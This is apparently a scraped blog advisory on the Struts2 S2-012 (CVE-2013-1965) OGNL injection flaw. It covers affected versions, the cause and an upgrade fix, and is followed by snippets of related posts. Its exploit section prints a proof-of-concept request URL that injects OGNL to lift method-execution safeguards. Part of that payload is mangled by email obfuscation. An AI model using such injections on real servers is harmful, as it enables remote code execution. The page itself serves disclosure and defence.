struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

1. Description

OGNL provides, among other features, extensive expression evaluation capabilities.
A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property, afterward used as request parameter of a redirect address, which will cause a further evaluation.
OGNL evaluation was already addressed in S2-003 and S2-005 and S2-009, but, since it involved just the parameter‘s name, it turned out that the resulting fixes based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, closed the vulnerability only partially.
The second evaluation happens when redirect result reads it from the stack and uses the previously injected code as redirect parameter.
This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.

2. Effected Scope

Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13

3. Exploit Analysis

0x1: POC

http://localhost:8080/S2-XX/Login.action?skillName=%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #[email protected]@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}

Relevant Link:

http://struts.apache.org/docs/s2-012.html

4. Principle Of Vulnerability

truts2中可以通过${express}或%{express}来引用ongl表达式,当配置一个action中有${input}或%{input}且input来自于外部输入时,给input赋值%{exp},从而导致任意代码执行
5. Patch Fix

0x1: upgrade struts2

It is strongly recommended to upgrade to Struts 2.3.14.1, which contains the corrected OGNL and XWork library.
//The OGNLUtil class was changed to deny eval expressions by default.

Relevant Link:

Copyright (c) 2015 Little5ann All rights reserved

时间: 2024-11-13 09:41:45

struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution的相关文章

struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix 1. Description Struts2框架存在一个DevMode模式,方便开发人员调试程序.如果启用该模式,攻击者可以构造特定代码导致OGNL表达式执行,以此对主机进行入侵Remote command execution and arbitrary file overwrite, St

struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix 1. Description XWork是一个命令模式框架,用于支持Struts 2及其他应用  在Atlassian Fisheye,Crucible和其他产品中使用的Struts 2.0.0至2.1.8.1版本中的Xwork中的OGNL表达式赋值功能使用许可的白名单,远程攻击者可以借助

struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix 1. Description struts2中有2个导航标签(action.redirect),后面可以直接跟ongl表达式,比如 1. test.action?action:${exp} 2. test.action?redirect:${exp} Struts2的DefaultActio

SharePoint 2013 开发——开发自定义操作APP

?博客地址:http://blog.csdn.net/FoxDave 自定义操作即我们所说的Ribbon和ECB(Edit Control Block),在SharePoint 2013之前,我们可以通过在解决方案中添加XML元素来实现创建自定义Ribbon和ECB,到了2013时代,利用APP也可以做类似的事情了,接下来我们看看如何利用APP来创建列表条目的自定义操作. 除了一些细节上的配置项,创建SharePoint APP项目跟之前提到的基本一样.列表条目信息通过查询字符串传递到外部的托管

"此站点已经禁用应用程序"在sharepoint 2013中通过v2013部署app提示该错误

该错误的原文是:the apps are disabled in this site 可以在yahoo或者bing上搜索这个错误,可以找到解决办法: msdn上也有该错误解决办法,但是如果搜索中文,目前是找不到的. 解决方案都是一致的,即sahrepoint2013安装完后,需要通过powershell创建app domain 原文地址:http://msdn.microsoft.com/en-us/library/fp179923%28v=office.15%29 操作命令: 在开始 shar

struts2 CVE-2012-0838 S2-007 Remote Code Execution

catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix 1. Description S2-007和S2-003.S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGNL表达式实现代码注入和执行,所不同的是 1. S2-003.S2-005: 通过OGNL的name-value的赋值解析过程.#

struts2漏洞攻击方法与解决方案

exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞. 漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability 相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理h

移动安全 - CVE官方关于Vnlnerability和Exposure的定义

Hanks.Wang - 专注于系统攻防与移动安全研究 [email protected] CVE官方关于Vnlnerability和Exposure的定义 Below are the CVE Initiative's definitions of the terms "Vulnerability" and "Exposure": Vulnerability An information security "vulnerability" is a

Oracle RAC --安装图解

规划:所用linux系统以虚拟化方式安装在esx上,配置有内网的yum源,各分配有16G存储,下面为简单拓扑图 一,下载软件1,地址:http://www.oracle.com/technology/software/products/database/oracle10g/htdocs/10201linx8664soft.html10201_database_linux_x86_64.cpio.gz10201_clusterware_linux_x86_64.cpio.gz 2,地址:http: